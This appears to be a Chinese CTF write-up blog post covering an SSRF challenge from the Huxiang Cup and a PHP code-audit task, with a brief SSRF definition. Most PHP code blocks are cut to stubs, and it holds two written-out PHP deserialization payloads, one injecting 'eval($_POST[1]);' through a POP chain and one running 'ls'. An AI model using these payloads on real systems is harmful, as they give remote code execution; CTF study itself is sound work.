关于某CTF交流群的入群题
关于某CTF交流群的入群题Orz。
换新题了,可以发了。
太菜了,只能挨打。
由于比赛冲突,湖湘杯也就没什么时间打,匆匆看了一题SSRF,以作笔记。
SSRF,即Server-Side Request Forgery,中文名服务端请求伪造,是一种由攻击者构造形成由服务器端发起请求的一个漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。
简单来说,就是利用一个可以发起网络请求的服务当作跳板来攻击内部其他服务。
1 | <?php |
1 | <?php |
1 | http://172.1.14.1/pop.php?ciscn[huaibei.pop=getflaggetflaggetflaggetflaggetflaggetflag&pop=;s:3:"end";O:2:"Go":1:{s:3:"ray";O:3:"Get":2:{s:4:"func";s:9:"phpinfo()";s:4:"name";O:3:"Get":2:{s:4:"func";O:4:"Done":4:{s:4:"eval";s:16:"eval($_POST[1]);";s:5:"class";N;s:3:"use";R:8;s:7:"useless";s:16:"eval($_POST[1]);";}s:4:"name";s:1:"1";}}}} |
1 | <?php |
1 | /?poc=O:1:%22A%22:2:{s:4:%22func%22;N;s:4:%22end2%22;R:2;}¶m=ls |
1 | <?php |
1 | <?php |
首发于安恒网络空间安全讲武堂,第一次投稿,不足之处还请海涵Orz。
一道代码审计题,看的我头痛【我的PHP实在是太菜了Orz。